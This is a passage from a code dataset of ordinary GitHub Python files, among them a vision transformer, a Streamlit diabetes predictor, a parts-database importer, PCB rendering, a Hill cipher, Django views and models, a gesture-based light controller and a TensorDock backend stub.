merge_last(x, n_dims):\n \"merge the last n_dims to a dimension\"\n s = x.size()\n assert n_dims > 1 and n_dims < len(s)\n return x.view(*s[:-n_dims], -1)\n\n\nclass MultiHeadedSelfAttention(nn.Module):\n \"\"\"Multi-Headed Dot Product Attention\"\"\"\n def __init__(self, dim, num_heads, dropout):\n super().__init__()\n self.proj_q = nn.Linear(dim, dim)\n self.proj_k = nn.Linear(dim, dim)\n self.proj_v = nn.Linear(dim, dim)\n self.drop = nn.Dropout(dropout)\n self.n_heads = num_heads\n self.scores = None # for visualization\n\n def forward(self, x, mask, control=False, which_column=0, which_head=0, save_attention=False, fh=0, fw=0):\n \"\"\"\n x, q(query), k(key), v(value) : (B(batch_size), S(seq_len), D(dim))\n mask : (B(batch_size) x S(seq_len))\n * split D(dim) into (H(n_heads), W(width of head)) ; D = H * W\n \"\"\"\n # (B, S, D) -proj-> (B, S, D) -split-> (B, S, H, W) -trans-> (B, H, S, W)\n \n q, k, v = self.proj_q(x), self.proj_k(x), self.proj_v(x)\n q, k, v = (split_last(x, (self.n_heads, -1)).transpose(1, 2) for x in [q, k, v])\n # (B, H, S, W) @ (B, H, W, S) -> (B, H, S, S) -softmax-> (B, H, S, S)\n scores = q @ k.transpose(-2, -1) / np.sqrt(k.size(-1))\n \n if save_attention:\n # save img\n print(\"Save Attention!!!\")\n attention_np = scores[0, which_head, which_column, :].cpu().numpy()\n attention_np = np.exp(attention_np) / (np.exp(attention_np).sum() + 1e-10)\n print(attention_np.shape, attention_np.min(), attention_np.max())\n attention_np = attention_np[:-1].reshape(int(np.sqrt(attention_np.shape[0]-1)), int(np.sqrt(attention_np.shape[0]-1)))\n \n attention_np = (attention_np * 255).astype(np.uint8)\n\n print(f\"--------------------- larger {(attention_np > 10).sum()}\")\n im = Image.fromarray(attention_np).convert('RGB')\n im.save(save_attention)\n\n if control:\n scores = scores\n torch.manual_seed(control)\n\n # perturbation\n replacement = torch.rand(scores[0, which_head, which_column, :].shape[0])\n \n scores[0, which_head, which_column, :] = replacement\n if mask is not None:\n mask = mask[:, None, None, :].float()\n scores -= 10000.0 * (1.0 - mask)\n scores = self.drop(F.softmax(scores, dim=-1))\n # (B, H, S, S) @ (B, H, S, W) -> (B, H, S, W) -trans-> (B, S, H, W)\n h = (scores @ v).transpose(1, 2).contiguous()\n # -merge-> (B, S, D)\n h = merge_last(h, 2)\n self.scores = scores\n return h\n\n\nclass PositionWiseFeedForward(nn.Module):\n \"\"\"FeedForward Neural Networks for each position\"\"\"\n def __init__(self, dim, ff_dim):\n super().__init__()\n self.fc1 = nn.Linear(dim, ff_dim)\n self.fc2 = nn.Linear(ff_dim, dim)\n\n def forward(self, x):\n # (B, S, D) -> (B, S, D_ff) -> (B, S, D)\n return self.fc2(F.gelu(self.fc1(x)))\n\n\nclass Block(nn.Module):\n \"\"\"Transformer Block\"\"\"\n def __init__(self, dim, num_heads, ff_dim, dropout):\n super().__init__()\n self.attn = MultiHeadedSelfAttention(dim, num_heads, dropout)\n self.proj = nn.Linear(dim, dim)\n self.norm1 = nn.LayerNorm(dim, eps=1e-6)\n self.pwff = PositionWiseFeedForward(dim, ff_dim)\n self.norm2 = nn.LayerNorm(dim, eps=1e-6)\n self.drop = nn.Dropout(dropout)\n\n def forward(self, x, mask, control=False, which_column=0, which_head=0, save_attention=False, fh=0, fw=0):\n if save_attention: print(f\"fefefre save_attention {save_attention}\")\n # print(f\"??? x {x.shape}\")\n h = self.drop(self.proj(self.attn(self.norm1(x), mask, control, which_column=which_column, which_head=which_head, save_attention=save_attention, fh=fh, fw=fw) ))\n x = x + h\n h = self.drop(self.pwff(self.norm2(x)))\n x = x + h\n return x\n\n\nclass Transformer(nn.Module):\n \"\"\"Transformer with Self-Attentive Blocks\"\"\"\n def __init__(self, num_layers, dim, num_heads, ff_dim, dropout):\n super().__init__()\n self.blocks = nn.ModuleList([\n Block(dim, num_heads, ff_dim, dropout) for _ in range(num_layers)])\n\n def forward(self, x, mask=None, control_seed=1, which_column=0, which_head=0, which_block=1, save_attention=False, fh=0, fw=0):\n # print(\"-----\")\n for idx, block in enumerate(self.blocks):\n if idx == which_block:\n # print(f\"x {x.shape}\")\n if save_attention: print(\"save_attention transformer\")\n x = block(x, mask, control=control_seed, which_column=which_column, which_head=which_head, save_attention=save_attention, fh=fh, fw=fw)\n else:\n x = block(x, mask)\n return x\n","repo_name":"Crazy-Jack/ViT-Playerground","sub_path":"pytorch_pretrained_vit/transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":5353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"37501299015","text":"import streamlit as st\r\nimport pickle\r\nimport pandas as pd\r\n\r\n\r\ndef main():\r\n style = \"\"\"

\r\n

Diabetes Prediction App

\r\n
\"\"\"\r\n st.markdown(style, unsafe_allow_html=True)\r\n left, right = st.columns((2,2))\r\n Pregnancies = left.number_input('Enter pregnancy count of the patient', step =1.0,format=\"%.1f\", value=0.0)\r\n Glucose = right.number_input('Enter glucose level of the patient', step=1.0, format='%.2f', value= 80.00)\r\n BloodPressure = left.number_input('Enter your blood pressure (mmHg)', step=1.0, format='%.2f', value=66.00)\r\n SkinThickness = right.number_input('Enter the Skin Thickness of the patient (mm)', step=1.0, format='%.2f', value=23.00)\r\n Insulin = left.number_input('Enter insulin level of the patient', step=1.0, format='%.1f', value=0.0)\r\n BMI = right.number_input('Enter BMI score of the patient', step=1.0, format='%.1f', value=28.0)\r\n DiabetesPedigreeFunction = left.number_input('Enter your Diabetes Pedigree rate for the patient', step=1.0, format='%.3f', value=0.160) \r\n Age = right.number_input('What is the current age for the patient', step=1.0, format='%.1f', value=43.0)\r\n button = st.button('Predict')\r\n # if button is pressed\r\n if button:\r\n # make prediction\r\n result = predict(Pregnancies, Glucose, BloodPressure, SkinThickness, Insulin,\r\n BMI, DiabetesPedigreeFunction, Age)\r\n st.success(f'The diabetic outcome for the patient is {result}')\r\n\r\n\r\n\r\n\r\n\r\n# load the train model\r\nwith open('diabetesModel1.pickle', 'rb') as rf:\r\n model = pickle.load(rf)\r\n\r\n# load the StandardScaler\r\nwith open('scaler.pickle', 'rb') as stds:\r\n scaler = pickle.load(stds)\r\n\r\ndef predict(Pregnancies, Glucose, BloodPressure, SkinThickness, Insulin,\r\n BMI, DiabetesPedigreeFunction, Age):\r\n # processing user input\r\n lists = [Pregnancies, Glucose, BloodPressure, SkinThickness, Insulin,\r\n BMI, DiabetesPedigreeFunction, Age]\r\n df = pd.DataFrame(lists).transpose()\r\n # scaling the data\r\n scaler.transform(df)\r\n # making predictions using the train model\r\n prediction = model.predict(df)\r\n result = int(prediction)\r\n return result\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"YanneseCode/diabetes-prediction","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"13250943719","text":"#!/usr/bin/python\n\n# 3rd party modules\nimport argparse\nimport psycopg2\n# internal modules\nimport ebase\n\n\nif __name__ == '__main__':\n conn = ebase.db_conn()\n cur = conn.cursor()\n\n parser = argparse.ArgumentParser(\n description=\"Imports parts from a Digi-Key csv file to the parts database.\")\n parser.add_argument(\"file\", help=\"csv file to import\",\n default=\"/home/matt/digikey.csv\")\n parser.parse_args()\n\n cur.execute(\"\"\"create temporary table tmp (index int, qty int, pn text, mfn text, description text, ref text,\n backorder int, unit_price numeric(5,2), total_price text)\"\"\")\n\n fname = '/home/matt/digikey.csv'\n ebase.csv_remove_quotes(fname)\n with open(fname, 'r') as f:\n if f.read(5) == \"Index\":\n ebase.csv_remove_header(fname)\n ebase.csv_remove_last_line(fname)\n\n with open(fname, 'r') as f:\n cur.copy_from(f, 'tmp', sep=',')\n\n cur.execute(\"\"\"insert into parts (mfn, description, stock, unit_price) select mfn, description, qty, unit_price\n from tmp on conflict (mfn) do update set stock = parts.stock + (select qty from tmp where tmp.mfn = parts.mfn)\"\"\")\n cur.execute(\"\"\"drop table tmp\"\"\")\n\n c = input(\"\\nCommit? y/n \")\n if c == 'y':\n conn.commit()\n elif c == 'n':\n print(\"Nothing done.\")\n exit(0)\n else:\n print(\"Must answer y/n.\")\n exit(1)\n\n cur.close()\n conn.close()\n","repo_name":"matthuszagh/ebase","sub_path":"import_digikey.py","file_name":"import_digikey.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"29714373182","text":"from coordinates import LinearTransformer, CircularTransformer\nfrom circuit_board import CircuitBoard\nfrom subcircuit import get_subcircuit\nfrom primitive import get_primitive\nfrom coordinates import from_mm, to_mm\nimport gerbertools\nimport math\nimport sys\n\nmainboard = CircuitBoard(mask_expansion=0.05)\nt = LinearTransformer()\nget_primitive('mainboard').instantiate(mainboard, t, (0, 0), 0, '', {})\nt = CircularTransformer((0, 0), from_mm(159.15), 0)\nget_subcircuit('mainboard').instantiate(mainboard, t, (from_mm(500), from_mm(0.85)), math.pi/2, '', {})\n\nprint('*** pouring inner layer polygons...')\nmainboard.add_poly_pours()\n\nprint('*** writing gerber output...')\nmainboard.to_file('output/mainboard')\n\nprint('*** running circuit DRC...')\nany_violations = False\nif not mainboard.get_netlist().check_composite():\n any_violations = True\n\nprint('*** building light barrier guide...')\nbarrier_gbr = gerbertools.CircuitBoard('output/mainboard.PCB', '.GM1', '');\nbarrier_gbr.add_copper_layer('.LB', 2.5)\nbarrier_gbr.write_obj('output/mainboard.Barrier.obj')\n\nprint('*** building PCB...')\n#mainboard_gbr = gerbertools.read('output/mainboard.PCB')\nprint('outline and hole data...')\nmainboard_gbr = gerbertools.CircuitBoard('output/mainboard.PCB', '.GM1', '.TXT');\nprint('bottom mask...')\nmainboard_gbr.add_mask_layer('.GBS', '.GBO');\nprint('bottom layer...')\nmainboard_gbr.add_copper_layer('.GBL', 0.035)\nmainboard_gbr.add_substrate_layer(0.1)\nprint('vcc layer...')\nmainboard_gbr.add_copper_layer('.G2', 0.0175)\nmainboard_gbr.add_substrate_layer(1.265)\nprint('gnd layer...')\nmainboard_gbr.add_copper_layer('.G1', 0.0175)\nmainboard_gbr.add_substrate_layer(0.1)\nprint('top layer...')\nmainboard_gbr.add_copper_layer('.GTL', 0.035)\nprint('top mask...')\nmainboard_gbr.add_mask_layer('.GTS', '.GTO');\nprint('surface finish...')\nmainboard_gbr.add_surface_finish()\n\nprint('*** building acrylic plates...')\ndisplay_gbr = gerbertools.CircuitBoard('output/mainboard.Display', '.GM1', '')\ndisplay_gbr.add_substrate_layer(3)\n\nfront_gbr = gerbertools.CircuitBoard('output/mainboard.Front', '.GM1', '')\nfront_gbr.add_mask_layer('', '.GM2')\nfront_gbr.add_substrate_layer(3)\n\nhighlight_gbr = gerbertools.CircuitBoard('output/mainboard.Highlight', '.GM1', '')\nhighlight_gbr.add_substrate_layer(5)\n\nprint('*** rendering to SVG...')\nwith open('output/mainboard.normal.svg', 'w') as f:\n f.write('\\n')\n f.write('\\n')\n f.write(mainboard_gbr.get_svg(False, gerbertools.color.mask_white(), gerbertools.color.silk_black(), id_prefix='mainboard'))\n\n #f.write('\\n')\n #for part in mainboard.get_parts():\n #if part.get_layer() == 'Ctop':\n #f.write('{}\\n'.format(\n #to_mm(part.get_coord()[0]),\n #to_mm(part.get_coord()[1]),\n #-part.get_rotation() * 180 / math.pi,\n #part.get_name()))\n #f.write('\\n')\n #f.write('\\n')\n #for net in mainboard.get_netlist().iter_physical():\n #for layer, coord, mode in net.iter_points():\n #if layer == 'GTL':\n #f.write('{}\\n'.format(\n #to_mm(coord[0]),\n #to_mm(coord[1]),\n #net.get_name()))\n #f.write('\\n')\n\n f.write('\\n')\n f.write('\\n')\n f.write(display_gbr.get_svg(False, soldermask=(0, 0, 0, 0), silkscreen=(0.7, 0.7, 0.7, 0.8), substrate=(0.1, 0.1, 0.1, 0.95), id_prefix='display'))\n f.write(highlight_gbr.get_svg(False, soldermask=(0, 0, 0, 0), silkscreen=(0.7, 0.7, 0.7, 0.8), substrate=(0.95, 0.95, 0.95, 0.95), id_prefix='highlight'))\n f.write('\\n')\n f.write('\\n')\n f.write(front_gbr.get_svg(False, soldermask=(0, 0, 0, 0), silkscreen=(0.7, 0.7, 0.7, 0.8), substrate=(0.6, 0.6, 0.6, 0.05), id_prefix='front'))\n f.write('\\n')\n f.write('\\n')\n\nmainboard_gbr.write_svg('output/mainboard.front.svg', False, 50.0, gerbertools.color.mask_white(), gerbertools.color.silk_black())\nmainboard_gbr.write_svg('output/mainboard.back.svg', True, 50.0, gerbertools.color.mask_white(), gerbertools.color.silk_black())\n\nprint('*** rendering to OBJ...')\nmainboard_gbr.write_obj('output/mainboard.PCB.obj')\ndisplay_gbr.write_obj('output/mainboard.Display.obj')\nfront_gbr.write_obj('output/mainboard.Front.obj')\nhighlight_gbr.write_obj('output/mainboard.Highlight.obj')\n\nprint('*** running physical DRC...')\nnets = []\nnl = mainboard.get_netlist()\nfor net in nl.iter_physical():\n name = nl.get_true_net_name(net.get_name())\n for layer, (x, y), mode in net.iter_points():\n layer = {\n 'GBS': 0,\n 'GBL': 0,\n 'G2': 1,\n 'G1': 2,\n 'GTL': 3,\n 'GTS': 3,\n }[layer]\n nets.append(((to_mm(x), to_mm(y)), layer, name))\nviolations = mainboard_gbr.build_netlist(nets, clearance=0.13, annular_ring=0.13).drc()\nfor violation in violations:\n if violation.startswith('logical net NO_NET is divided up into'):\n continue\n print(violation)\n any_violations = True\n\nprint()\nif any_violations:\n print('There were DRC errors :(')\n sys.exit(1)\nelse:\n print('Everything checks out! :D')\n\n","repo_name":"jvanstraten/gated-clock","sub_path":"generator/compose_mainboard.py","file_name":"compose_mainboard.py","file_ext":"py","file_size_in_byte":5826,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"37582555928","text":"def Hill(plainTextBlock, keyMatrix, mode):\r\n\r\n value, genText = 0, \"\"\r\n\r\n for i in range(mode):\r\n\r\n for j in range(mode): value += ( ord( keyMatrix[i][j] ) - 65 ) * ( ord( plainTextBlock[j] ) - 65 )\r\n\r\n genText += chr( 65 + ( value % 26 ) ) \r\n value = 0\r\n\r\n return genText\r\n\r\ndef HillSplit(plainText, key, mode):\r\n\r\n plainText, key, textLen, keyLen = plainText.upper(), key.upper(), len(plainText), len(key)\r\n keyValues = [ (ord(key[i])-65) for i in range(len(key)) ]\r\n textSplit, cipher, x, token = [], \"\", 0, 3 if mode == \"T\" else 2 \r\n\r\n if textLen % token != 0: plainText += \"\".join( \"K\" for i in range( token - textLen % token ))\r\n\r\n if keyLen < pow(token,2): key += \"\".join( chr(65+i) for i in range( pow(token,2) - keyLen )) \r\n else : key = \"\".join( key[char] for char in range( pow(token,2) ) )\r\n\r\n keySplit = [ key[i:i+token] for i in range(0,len(key),token)]\r\n textSplit += [ plainText[x:x+token] for x in range(0, len(plainText), token) ]\r\n cipher += \"\".join( Hill( textSplit[i], keySplit, token ) for i in range(len(textSplit)))\r\n \r\n return cipher\r\n \r\npT = input(\"Enter plain text for encryption : \").replace(\" \",\"\")\r\nmode = input(\"Press D for digraph \\nPress T for trigraph : ___\")\r\nkey = input(\"Enter the key : \").replace(\" \",\"\")\r\nprint(HillSplit(pT,key, mode))","repo_name":"ohoadit/ciphers","sub_path":"Hill.py","file_name":"Hill.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"23194706257","text":"from django.core.validators import FileExtensionValidator\nfrom django.db import models\nfrom django.contrib.auth.models import Group\n\n\nclass Documento(models.Model):\n documento = models.CharField(max_length=255)\n upload = models.FileField(upload_to='documento/', validators=[FileExtensionValidator(allowed_extensions=['pdf'])])\n descricao = models.TextField('descrição', blank=True, null=True)\n criado = models.DateTimeField( 'criado em', auto_now_add=True, auto_now=False)\n modificado = models.DateTimeField( 'modificado em', auto_now_add=False, auto_now=True)\n grupo = models.ManyToManyField(Group, blank=True)\n\n\n class Meta :\n ordering = ['modificado','documento']\n\n def __str__(self):\n return f\"{self.documento}\"\n","repo_name":"marcelogumercinocosta/portal","sub_path":"apps/biblioteca/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"27236221441","text":"# Justpy Tutorial demo for_example2 from docs/blog/vue_comparison.md\nimport justpy as jp\n\ndef for_example2():\n wp = jp.WebPage(tailwind=False)\n ul = jp.Ul(a=wp)\n ul.items = [{'message': 'Foo'},\n {'message': 'Bar'}]\n ul.parent_message = 'Parent'\n for index, item in enumerate(ul.items):\n jp.Li(text=f'{ul.parent_message}-{index}-{item[\"message\"]}', a=ul)\n return wp\n\n# initialize the demo\nfrom examples.basedemo import Demo\nDemo (\"for_example2\",for_example2)\n","repo_name":"justpy-org/justpy","sub_path":"examples/blog/vue_comparison/for_example2.py","file_name":"for_example2.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":1107,"dataset":"github-code","pt":"43"} +{"seq_id":"74495764608","text":"import os\nimport cv2\nimport mediapipe as mp\nimport numpy as np\nfrom dotenv import load_dotenv\nfrom light_ctrl import LightController\n\nload_dotenv()\n\nmp_drawing = mp.solutions.drawing_utils\nmp_drawing_styles = mp.solutions.drawing_styles\nmp_hands = mp.solutions.hands\n\nTOKEN = os.getenv('TOKEN')\n\nlight = LightController(TOKEN)\n\ndef is_fist(results):\n # Minimum distance fingers need to be from wrist\n MIN_DIST = 0.17\n\n # Finger and wrsit (x,y) coordinates\n middle_finger = np.array([results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.MIDDLE_FINGER_TIP].x, \n results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.MIDDLE_FINGER_TIP].y])\n\n ring_finger = np.array([results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.RING_FINGER_TIP].x, \n results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.RING_FINGER_TIP].y])\n\n pinky_finger = np.array([results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.PINKY_TIP].x, \n results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.PINKY_TIP].y])\n\n wrist = np.array([results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.WRIST].x, \n results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.WRIST].y])\n\n # Calcuating Euclidean distance between wrist and fingers\n dist_middle = np.linalg.norm(middle_finger-wrist)\n dist_ring = np.linalg.norm(ring_finger-wrist)\n dist_pinky = np.linalg.norm(pinky_finger-wrist)\n\n # Check if all fingers are the minimum distance from wrist\n if dist_middle < MIN_DIST and dist_ring < MIN_DIST and dist_pinky < MIN_DIST:\n return True\n\n return False\n\ndef is_three_finger_pinch(results):\n # Minimum distance between thumb, ring, and middle finger\n MIN_DIST = 0.1\n\n middle_finger = np.array([results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.MIDDLE_FINGER_TIP].x, \n results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.MIDDLE_FINGER_TIP].y])\n\n ring_finger = np.array([results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.RING_FINGER_TIP].x, \n results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.RING_FINGER_TIP].y])\n\n thumb = np.array([results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.THUMB_TIP].x, \n results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.THUMB_TIP].y])\n\n dist_middle = np.linalg.norm(middle_finger-thumb)\n dist_ring = np.linalg.norm(ring_finger-thumb)\n\n if dist_middle < MIN_DIST and dist_ring < MIN_DIST:\n return True\n\n return False\n\ndef is_two_finger(results):\n # Minimum distance between index and middle finger\n MIN_DIST_FINGERS_UP = 0.1\n # Minimum distance between ring and pink finger and wrist\n MIN_DIST_FINGERS_DOWN = 0.3\n\n middle_finger = np.array([results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.MIDDLE_FINGER_TIP].x, \n results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.MIDDLE_FINGER_TIP].y])\n\n index_finger = np.array([results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.INDEX_FINGER_TIP].x, \n results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.INDEX_FINGER_TIP].y])\n\n ring_finger = np.array([results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.RING_FINGER_TIP].x, \n results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.RING_FINGER_TIP].y])\n\n pinky_finger = np.array([results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.PINKY_TIP].x, \n results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.PINKY_TIP].y])\n\n wrist = np.array([results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.WRIST].x, \n results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.WRIST].y])\n\n dist_middle_index = np.linalg.norm(middle_finger-index_finger)\n dist_pinky_wrist = np.linalg.norm(pinky_finger-wrist)\n dist_ring_wrist = np.linalg.norm(ring_finger-wrist)\n\n if dist_middle_index < MIN_DIST_FINGERS_UP and dist_pinky_wrist < MIN_DIST_FINGERS_DOWN and dist_ring_wrist < MIN_DIST_FINGERS_DOWN:\n return True\n\n return False\n\n# For webcam input:\ncap = cv2.VideoCapture(0)\n\nwith mp_hands.Hands(min_detection_confidence=0.8, min_tracking_confidence=0.5) as hands:\n while cap.isOpened():\n success, image = cap.read()\n\n # Ignoring empty camera frame.\n if not success:\n continue\n\n image.flags.writeable = False\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n results = hands.process(image)\n image.flags.writeable = True\n\n # Index finger x coordinate used for brightness change\n index_finger_x = None\n\n # Flags for light state changes\n was_turned_off = False\n was_turned_on = False\n had_brightness_changed = False\n\n if results.multi_hand_landmarks:\n for hand_landmarks in results.multi_hand_landmarks:\n # Draw finger and joint marks on image\n mp_drawing.draw_landmarks(\n image,\n hand_landmarks,\n mp_hands.HAND_CONNECTIONS,\n mp_drawing_styles.get_default_hand_landmarks_style(),\n mp_drawing_styles.get_default_hand_connections_style())\n\n # Turn light off if fist is detected\n if is_fist(results):\n light.turn_off(go_fast=True)\n was_turned_off = True\n\n if is_three_finger_pinch(results):\n light.turn_on(go_fast=True)\n was_turned_on = True\n\n # Enter brightness mode if index and middle finger raised is detected\n if is_two_finger(results):\n # Get index finger x coordinate minus 1 to account for image flip\n index_finger_x = round(1 - results.multi_hand_landmarks[0].landmark[mp_hands.HandLandmark.INDEX_FINGER_TIP].x, 1)\n light.set_brightness(index_finger_x, go_fast=True)\n had_brightness_changed = True\n\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n image = cv2.flip(image, 1)\n\n # Add text to image based on light state changes\n if had_brightness_changed:\n cv2.putText(image, 'Brightness: ' + str(int(index_finger_x * 100)) + '%', (50, 50), cv2.FONT_HERSHEY_DUPLEX, \n 1, (255, 195, 0), 2, cv2.LINE_AA)\n \n if was_turned_on:\n cv2.putText(image, 'Light On', (50, 50), cv2.FONT_HERSHEY_DUPLEX, \n 1, (247, 255, 71), 2, cv2.LINE_AA)\n\n if was_turned_off:\n cv2.putText(image, 'Light Off', (50, 50), cv2.FONT_HERSHEY_DUPLEX, \n 1, (0, 0, 0), 2, cv2.LINE_AA)\n\n cv2.imshow('Lumand', image)\n\n #press ESC key to exit\n if cv2.waitKey(5) & 0xFF == 27:\n break\n\ncap.release()\ncv2.destroyAllWindows()","repo_name":"Diego-Segovia/Lumand","sub_path":"light_controller/hand_controller.py","file_name":"hand_controller.py","file_ext":"py","file_size_in_byte":7109,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"15443546575","text":"import pandas as pd\n\ndata = pd.read_csv(\"processed.csv\")\nexp_to_title = {}\nfor row in data.iterrows():\n exp, title, _, _, _, _ = row[1]\n if exp not in exp_to_title:\n exp_to_title[exp] = set(title)\n else:\n exp_to_title[exp].add(title)\n\nintersection = None\nfor k, v in exp_to_title.items():\n if intersection is None:\n intersection = v\n else:\n intersection = intersection.intersection(v)\n\nvalid_jobs = [x for x in intersection if len(x)>1]\nprint(valid_jobs)\n\n#data[data['job_title'].isin(valid_jobs)].to_csv(\"valid_jobs.csv\", index=False)","repo_name":"ComanacDragos/University","sub_path":"Semester 2 Master/KD/triadic_dataset/filter_jobs.py","file_name":"filter_jobs.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"34409041912","text":"\n#coding=utf-8\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nfrom django.shortcuts import render\nfrom django.http import HttpResponse,HttpResponseRedirect,JsonResponse\nfrom django.core.urlresolvers import reverse\nfrom django.views.decorators.csrf import csrf_exempt\n\nimport os,stat,socket,traceback\nimport subprocess,threading\nimport time,datetime\nimport base64\nimport json\nimport re\nfrom car.models import Axisdata,Carphoto,Heartdata\n\n@csrf_exempt\ndef handle_index(request):\n #return render(request,\"index/index.html\")\n return HttpResponseRedirect(reverse(\"car:car_constantly\"))\n\n@csrf_exempt\ndef handle_car_constantly(request):\n \"\"\"\n 实时数据展示\n {\n \"photo_time\":\"12345678\",\"plate_number\":\"冀J0R6A3\",\"photo_paht\":\"/var/ftp/pub/luo/20180607/冀J0R6A3\", # CarPhoto\n \"total_weight\":\"100kg\",\"speed\":\"80\",\"temperature\":\"90\", # HeartData\n \"savedb_time\":\"1992202020\", # AxisData\n \"car_axle1\":\"80kg\",\n \"car_axle2\":\"80kg\",\n \"car_axle3\":\"80kg\",\n \"car_axle4\":\"80kg\",\n \"car_axle5\":\"80kg\",\n \"car_axle6\":\"80kg\",\n \"car_axle7\":\"80kg\",\n \"car_axle8\":\"80kg\",\n \"car_axle9\":\"80kg\",\n \"car_axle10\":\"80kg\",\n }\n \"\"\"\n if request.method == \"GET\":\n car_obj = [{\n \"photo_time\":\"12345678\",\"plate_number\":\"冀J0R6A3\",\"photo_path\":\"/var/ftp/pub/luo/20180607/冀J0R6A3\",\n \"total_weight\":\"100kg\",\"speed\":\"80\",\"temperature\":\"90\",\n \"savedb_time\":\"1992202020\",\n }]\n return render(request,\"car/car_constantly.html\",{\"car_obj\":car_obj})\n\n elif request.method == \"POST\":\n car_obj = [{\n \"photo_time\":\"12345678\",\n\t\t \"plate_number\":\"冀J0R6A3\",\n\t \t \"photo_path\":\"\\\"system_process-img\\\"\",\n \"savedb_time\":\"1992202020\",\n \"total_weight1\":\"100kg\",\n \"total_weight2\":\"100kg\",\n }]\n \n from car.models import Axisdata,Carphoto,Heartdata\n CarPhoto_set = Carphoto.objects.all().order_by(\"-id\")[:10]\n Axisdata_set = Axisdata.objects.all()\n list1 = []\n for obj in CarPhoto_set:\n car_line ={\n \"photo_time\":None,\n\t\t \"plate_number\":None,\n\t \t \"photo_path\":None,\n \"savedb_time\":None,\n \"total_weight1\":None,\n \"total_weight2\":None\n }\n car_newest_ticks = Axisdata.objects.filter(carno = obj.carno).order_by('-id')[0].ticks\n car_info_set = Axisdata.objects.filter(ticks = car_newest_ticks)\n car_line[\"photo_time\"] = obj.ticks\n car_line[\"plate_number\"] = obj.carno\n car_line[\"photo_path\"] = obj.pathname\n car_line[\"savedb_time\"] = car_newest_ticks\n car_line[\"total_weight1\"] = 100\n car_line[\"total_weight2\"] = 100\n list1.append(car_line)\n\n \n data ={\n \"draw\":1,\n \"recordsTotal\":1,\n \"recordsFiltered\":1,\n \"data\":list1\n }\n return JsonResponse(data)\n \n","repo_name":"945941192/car_project","sub_path":"car_site/car/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"35593389613","text":"import json\nfrom typing import List, Optional\n\nimport requests\n\nfrom dstack._internal.core.backends.base import Compute\nfrom dstack._internal.core.backends.base.compute import get_shim_commands\nfrom dstack._internal.core.backends.base.offers import get_catalog_offers\nfrom dstack._internal.core.backends.tensordock.api_client import TensorDockAPIClient\nfrom dstack._internal.core.backends.tensordock.config import TensorDockConfig\nfrom dstack._internal.core.errors import NoCapacityError\nfrom dstack._internal.core.models.backends.base import BackendType\nfrom dstack._internal.core.models.instances import (\n InstanceAvailability,\n InstanceOfferWithAvailability,\n LaunchedInstanceInfo,\n)\nfrom dstack._internal.core.models.runs import Job, Requirements, Run\nfrom dstack._internal.utils.logging import get_logger\n\nlogger = get_logger(__name__)\n\n\nclass TensorDockCompute(Compute):\n def __init__(self, config: TensorDockConfig):\n self.config = config\n self.api_client = TensorDockAPIClient(config.creds.api_key, config.creds.api_token)\n\n def get_offers(\n self, requirements: Optional[Requirements] = None\n ) -> List[InstanceOfferWithAvailability]:\n offers = get_catalog_offers(\n backend=BackendType.TENSORDOCK,\n requirements=requirements,\n )\n offers = [\n InstanceOfferWithAvailability(\n **offer.dict(), availability=InstanceAvailability.AVAILABLE\n )\n for offer in offers\n ]\n return offers\n\n def run_job(\n self,\n run: Run,\n job: Job,\n instance_offer: InstanceOfferWithAvailability,\n project_ssh_public_key: str,\n project_ssh_private_key: str,\n ) -> LaunchedInstanceInfo:\n commands = get_shim_commands(\n backend=BackendType.TENSORDOCK,\n image_name=job.job_spec.image_name,\n authorized_keys=[\n run.run_spec.ssh_key_pub.strip(),\n project_ssh_public_key.strip(),\n ],\n 